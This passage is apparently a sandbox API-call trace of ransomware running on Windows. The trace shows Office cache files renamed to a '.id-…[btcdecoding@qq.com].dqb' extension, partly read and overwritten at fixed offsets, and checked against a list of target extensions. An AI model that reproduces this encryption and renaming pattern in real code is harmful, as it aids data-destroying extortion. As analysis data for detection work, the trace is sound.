users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.560] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0044.560] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0044.560] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc6c | out: lpNewFilePointer=0x0) returned 1 [0044.560] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0044.560] ReadFile (in: hFile=0x1dc, lpBuffer=0x3970058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x3970058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.578] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x12d4aa, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0044.578] ReadFile (in: hFile=0x1dc, lpBuffer=0x39b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x39b0058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.586] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2dbfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0044.586] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x347e00, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0044.586] ReadFile (in: hFile=0x1dc, lpBuffer=0x39f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x39f0058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.878] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.878] WriteFile (in: hFile=0x1dc, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xc0106, lpNumberOfBytesWritten=0x2dbfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfcb0*=0xc0106, lpOverlapped=0x0) returned 1 [0044.914] SetEndOfFile (hFile=0x1dc) returned 1 [0044.914] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3f34088 [0044.948] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0044.948] WriteFile (in: hFile=0x1dc, lpBuffer=0x3f34088*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f34088*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.950] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x12d4aa, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0044.950] WriteFile (in: hFile=0x1dc, lpBuffer=0x3f34088*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f34088*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.954] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x347e00, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0044.954] WriteFile (in: hFile=0x1dc, lpBuffer=0x3f34088*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f34088*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.956] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3f34088 | out: hHeap=0x570000) returned 1 [0044.956] CloseHandle (hObject=0x1dc) returned 1 [0044.957] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0044.957] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0044.957] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0044.957] lstrlenW (lpString=".doc") returned 4 [0044.957] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0044.957] lstrlenW (lpString=".docx") returned 5 [0044.957] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0044.957] lstrlenW (lpString=".pdf") returned 4 [0044.957] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0044.957] lstrlenW (lpString=".xls") returned 4 [0044.957] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0044.957] lstrlenW (lpString=".xlsx") returned 5 [0044.957] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0044.957] lstrlenW (lpString=".ppt") returned 4 [0044.958] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0044.958] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0044.958] lstrlenW (lpString=".zip") returned 4 [0044.958] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0044.958] lstrlenW (lpString=".rar") returned 4 [0044.958] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0044.958] lstrlenW (lpString=".bz2") returned 4 [0044.958] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0044.958] lstrlenW (lpString=".7z") returned 3 [0044.958] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0044.958] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0044.958] lstrlenW (lpString=".dbf") returned 4 [0044.958] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0044.958] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0044.958] lstrlenW (lpString=".1cd") returned 4 [0044.958] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0044.958] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0044.958] lstrlenW (lpString=".jpg") returned 4 [0044.958] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0044.958] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0044.958] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0044.958] lstrlenW (lpString=".doc") returned 4 [0044.958] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0044.958] lstrlenW (lpString=".docx") returned 5 [0044.958] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0044.958] lstrlenW (lpString=".pdf") returned 4 [0044.958] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0044.958] lstrlenW (lpString=".xls") returned 4 [0044.958] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0044.958] lstrlenW (lpString=".xlsx") returned 5 [0044.958] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0044.958] lstrlenW (lpString=".ppt") returned 4 [0044.958] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0044.958] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0044.958] lstrlenW (lpString=".zip") returned 4 [0044.959] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0044.959] lstrlenW (lpString=".rar") returned 4 [0044.959] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0044.959] lstrlenW (lpString=".bz2") returned 4 [0044.959] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0044.959] lstrlenW (lpString=".7z") returned 3 [0044.959] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0044.959] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0044.959] lstrlenW (lpString=".dbf") returned 4 [0044.959] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0044.959] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0044.959] lstrlenW (lpString=".1cd") returned 4 [0044.959] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0044.959] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0044.959] lstrlenW (lpString=".jpg") returned 4 [0044.959] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0044.959] lstrcmpiW (lpString1=".msi", lpString2=".dqb") returned 1 [0044.959] lstrlenW (lpString="Office32WW.msi") returned 14 [0044.959] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0044.960] GetFileSizeEx (in: hFile=0x1dc, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=1992192) returned 1 [0044.960] CloseHandle (hObject=0x1dc) returned 1 [0044.960] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi")) returned 0x2020 [0044.960] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.960] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0044.960] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0044.961] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc6c | out: lpNewFilePointer=0x0) returned 1 [0044.961] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0044.961] ReadFile (in: hFile=0x1dc, lpBuffer=0x3970058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x3970058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.974] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0044.974] ReadFile (in: hFile=0x1dc, lpBuffer=0x39b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x39b0058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.978] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2dbfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0044.978] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0044.978] ReadFile (in: hFile=0x1dc, lpBuffer=0x39f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x39f0058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.994] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.994] WriteFile (in: hFile=0x1dc, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x2dbfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfcb0*=0xc0108, lpOverlapped=0x0) returned 1 [0045.151] SetEndOfFile (hFile=0x1dc) returned 1 [0045.151] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3f24080 [0045.152] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0045.152] WriteFile (in: hFile=0x1dc, lpBuffer=0x3f24080*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f24080*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.153] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0045.153] WriteFile (in: hFile=0x1dc, lpBuffer=0x3f24080*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f24080*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.155] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0045.155] WriteFile (in: hFile=0x1dc, lpBuffer=0x3f24080*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f24080*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.157] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3f24080 | out: hHeap=0x570000) returned 1 [0045.157] CloseHandle (hObject=0x1dc) returned 1 [0045.158] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0045.158] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0045.158] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0045.158] lstrlenW (lpString=".doc") returned 4 [0045.158] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0045.158] lstrlenW (lpString=".docx") returned 5 [0045.158] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0045.158] lstrlenW (lpString=".pdf") returned 4 [0045.158] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0045.158] lstrlenW (lpString=".xls") returned 4 [0045.158] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0045.158] lstrlenW (lpString=".xlsx") returned 5 [0045.158] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0045.158] lstrlenW (lpString=".ppt") returned 4 [0045.158] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0045.158] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0045.158] lstrlenW (lpString=".zip") returned 4 [0045.158] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0045.158] lstrlenW (lpString=".rar") returned 4 [0045.158] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0045.158] lstrlenW (lpString=".bz2") returned 4 [0045.158] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0045.158] lstrlenW (lpString=".7z") returned 3 [0045.159] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0045.159] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0045.159] lstrlenW (lpString=".dbf") returned 4 [0045.159] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0045.159] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0045.159] lstrlenW (lpString=".1cd") returned 4 [0045.159] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0045.159] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0045.159] lstrlenW (lpString=".jpg") returned 4 [0045.159] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0045.159] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0045.159] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0045.159] lstrlenW (lpString=".doc") returned 4 [0045.159] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0045.159] lstrlenW (lpString=".docx") returned 5 [0045.159] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0045.159] lstrlenW (lpString=".pdf") returned 4 [0045.159] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0045.159] lstrlenW (lpString=".xls") returned 4 [0045.159] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0045.159] lstrlenW (lpString=".xlsx") returned 5 [0045.159] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0045.159] lstrlenW (lpString=".ppt") returned 4 [0045.159] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0045.159] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0045.159] lstrlenW (lpString=".zip") returned 4 [0045.159] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0045.159] lstrlenW (lpString=".rar") returned 4 [0045.159] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0045.159] lstrlenW (lpString=".bz2") returned 4 [0045.159] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0045.159] lstrlenW (lpString=".7z") returned 3 [0045.159] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0045.159] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0045.159] lstrlenW (lpString=".dbf") returned 4 [0045.160] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0045.160] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0045.160] lstrlenW (lpString=".1cd") returned 4 [0045.160] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0045.160] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0045.160] lstrlenW (lpString=".jpg") returned 4 [0045.160] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0045.160] lstrcmpiW (lpString1=".cab", lpString2=".dqb") returned -1 [0045.160] lstrlenW (lpString="OWOW32WW.cab") returned 12 [0045.160] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0045.160] GetFileSizeEx (in: hFile=0x1dc, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=36233052) returned 1 [0045.160] CloseHandle (hObject=0x1dc) returned 1 [0045.160] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab")) returned 0x2020 [0045.160] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0045.161] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0045.161] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0045.161] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc6c | out: lpNewFilePointer=0x0) returned 1 [0045.161] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0045.161] ReadFile (in: hFile=0x1dc, lpBuffer=0x3970058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x3970058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.387] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0045.388] ReadFile (in: hFile=0x1dc, lpBuffer=0x39b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x39b0058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.565] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2dbfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0045.565] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0045.565] ReadFile (in: hFile=0x1dc, lpBuffer=0x39f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x39f0058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.656] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.656] WriteFile (in: hFile=0x1dc, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x2dbfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0045.848] SetEndOfFile (hFile=0x1dc) returned 1 [0045.848] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3f24080 [0045.851] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0045.851] WriteFile (in: hFile=0x1dc, lpBuffer=0x3f24080*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f24080*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.852] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0045.852] WriteFile (in: hFile=0x1dc, lpBuffer=0x3f24080*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f24080*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.853] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0045.853] WriteFile (in: hFile=0x1dc, lpBuffer=0x3f24080*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f24080*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.855] 